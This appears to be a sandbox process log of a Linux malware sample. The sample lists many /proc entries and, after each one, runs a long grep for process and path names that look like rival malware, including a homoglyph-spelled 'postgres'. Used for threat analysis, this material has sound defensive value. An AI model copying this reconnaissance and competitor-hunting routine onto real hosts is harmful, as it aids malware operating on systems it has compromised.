/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1246
-
-
/bin/grepgrep exe2⤵PID:1249
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1248
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1251
-
-
/bin/grepgrep exe2⤵PID:1254
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1253
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1256
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1258
-
-
/bin/grepgrep exe2⤵PID:1259
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1261
-
-
/bin/grepgrep exe2⤵PID:1264
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1263
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1266
-
-
/bin/grepgrep exe2⤵PID:1269
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1268
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1271
-
-
/bin/grepgrep exe2⤵PID:1274
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1273
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1276
-
-
/bin/grepgrep exe2⤵PID:1279
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1278
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1281
-
-
/bin/grepgrep exe2⤵PID:1284
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1283
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1286
-
-
/bin/grepgrep exe2⤵PID:1289
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1288
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1291
-
-
/bin/grepgrep exe2⤵PID:1296
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1295
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1298
-
-
/bin/grepgrep exe2⤵PID:1301
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1300
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1304
-
-
/bin/grepgrep exe2⤵PID:1308
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1307
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1310
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1313
-
-
/bin/grepgrep exe2⤵PID:1314
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1317
-
-
/bin/grepgrep exe2⤵PID:1320
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1319
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1323
-
-
/bin/grepgrep exe2⤵PID:1327
-
-
/bin/lsls -latrh /proc/net2⤵PID:1326
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1329
-
-
/bin/grepgrep exe2⤵PID:1333
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1332
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1336
-
-
/bin/grepgrep exe2⤵PID:1340
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1339
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1343
-
-
/bin/grepgrep exe2⤵PID:1346
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1345
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1349
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1355
-
-
/bin/grepgrep exe2⤵PID:1359
-
-
/bin/lsls -latrh /proc/self2⤵PID:1358
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1362
-
-
/bin/grepgrep exe2⤵PID:1365
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1364
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1369
-
-
/bin/grepgrep exe2⤵PID:1372
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1371
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1375
-
-
/bin/grepgrep exe2⤵PID:1379
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1378
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1381
-
-
/bin/grepgrep exe2⤵PID:1385
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1384
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1388
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1390
-
-
/bin/grepgrep exe2⤵PID:1391
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1395
-
-
/bin/grepgrep exe2⤵PID:1398
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1397
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1401
-
-
/bin/grepgrep exe2⤵PID:1405
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1404
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1407
-
-
/bin/grepgrep exe2⤵PID:1411
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1410
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1414
-
-
/bin/grepgrep exe2⤵PID:1417
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1416
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1420
-
-
/bin/grepgrep exe2⤵PID:1424
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1423
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1426
-
-
/bin/grepgrep exe2⤵PID:1429
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1428
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1431
-
-
/bin/grepgrep exe2⤵PID:1434
-
-
/bin/lsls -latrh /proc/version2⤵PID:1433
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1436
-
-
/bin/grepgrep exe2⤵PID:1439
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1438
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1441
-
-
/bin/grepgrep exe2⤵PID:1444
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1443
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1446
-
-
/bin/grepgrep exe2⤵PID:1449
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1448
-
-
